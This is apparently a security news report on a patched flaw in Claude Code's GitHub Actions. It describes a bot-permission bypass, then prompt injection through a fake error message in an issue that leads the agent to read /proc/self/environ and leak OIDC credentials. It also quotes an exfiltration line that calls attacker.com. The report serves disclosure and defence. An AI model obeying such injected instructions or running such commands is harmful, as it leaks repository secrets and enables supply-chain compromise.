Claude’s GitHub Actions Flaw Compromises Any Repository

A critical supply chain vulnerability in Claude Code’s GitHub Actions could allow attackers to compromise any repository using Anthropic’s official CI/CD workflow. This includes Anthropic’s own infrastructure.

The vulnerability, discovered by security researcher RyotaK of GMO Flatt Security and patched in Claude Code GitHub Actions v1.0.94, stems from a flawed permission model in the checkWritePermissions function.

When combined with prompt injection techniques, it could enable a fully unauthenticated external attacker to exfiltrate secrets, steal OIDC tokens, and push malicious code to any downstream repository that depends on the Claude Code GitHub Actions workflow.

Claude Code GitHub Actions restricts workflow execution to users with write or admin access. However, the checkWritePermissions function unconditionally trusted any actor ending in [bot] regardless of actual permissions.

Since GitHub Apps have implicit read access to public repositories and can create issues or pull requests on any public repo using only an installation token, an attacker could bypass this control entirely.

Claude Code’s GitHub Actions Vulnerability

The attack required just three steps: create a malicious GitHub App, install it on any attacker-controlled repository (no special permissions needed), and use its installation token to open an issue or pull request in the target repository.

Because the actor appeared as a GitHub App bot, the permission check returned true and the workflow processed the attacker-controlled content. While tag mode had an additional checkHumanActor check, agent mode lacked this safeguard at the time of discovery.

Once the bypass was achieved, the attacker could craft a malicious issue description containing a fake error message to trick Claude Code into executing embedded commands, a classic prompt injection attack.

Claude Code permits certain Bash commands (such as cat and head) without explicit user approval, allowing an attacker to read /proc/self/environ, a Linux pseudo-file exposing all environment variables passed to the workflow process.

Among those environment variables, the most sensitive are ACTIONS_ID_TOKEN_REQUEST_TOKEN and ACTIONS_ID_TOKEN_REQUEST_URL — the credentials used to request an OpenID Connect (OIDC) token from GitHub Actions.

Claude Code GitHub Actions uses this OIDC token to obtain a privileged Claude GitHub App installation token from Anthropic’s backend via https://api.anthropic.com/api/github/github-app-token-exchange.

With these exfiltrated credentials, an attacker could replicate the entire token exchange process and obtain a GitHub App token with write access to repository contents, issues, pull requests, and workflows.

The mcp__github__update_issue MCP tool permitted in Anthropic’s own issue triage workflow was then abused to write the stolen secrets back into a public issue, where the attacker could simply read them.

The most severe consequence was that the anthropics/claude-code-action repository itself used a vulnerable agent mode workflow. A successful exploit would allow an attacker to inject malicious code directly into the action’s source, which would then propagate to every downstream repository depending on it a classic supply chain attack.

In total, the full attack chain involved seven steps: from creating a rogue GitHub App to pushing backdoored code to Anthropic’s own repository.

Separately, RyotaK identified a misconfiguration in Anthropic’s official example workflows using allowed_non_write_users: "*".

When combined with issues: write permissions and a second workflow using id-token: write, an external attacker could chain the two workflows: use the triage workflow to steal a GITHUB_TOKEN via Claude’s publicly visible workflow run summary, then edit an existing issue to inject prompts into the tag-mode workflow ultimately escalating to full repository compromise without ever needing the GitHub App bypass.

Notably, even the gh issue view CLI command was weaponizable for exfiltration; prompt injection could instruct Claude to embed secrets in URL path arguments (e.g., gh issue view https://attacker.com/<secret>), sending credentials to an external server.

Anthropic addressed the vulnerabilities in Claude Code GitHub Actions v1.0.94. Fixes included adding a checkHumanActor call to agent mode, disabling the workflow run summary section by default, scrubbing environment variables from child processes spawned by Claude Code, and implementing a custom gh command wrapper that validates arguments and blocks exfiltration-capable URL patterns.

Anthropic also added logic to ignore issues and comments edited after a workflow is triggered, closing the workflow-chaining attack vector.

The researcher rated the vulnerabilities at CVSS v4.0 score of 7.8. Anthropic awarded $3,800 plus a $1,000 bonus through its bug bounty program

Users still running Claude Code GitHub Actions are advised to audit any workflow using allowed_non_write_users, restrict exposed secrets to only the Anthropic API key and GITHUB_TOKEN, and review workflow run logs for indicators of compromise.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.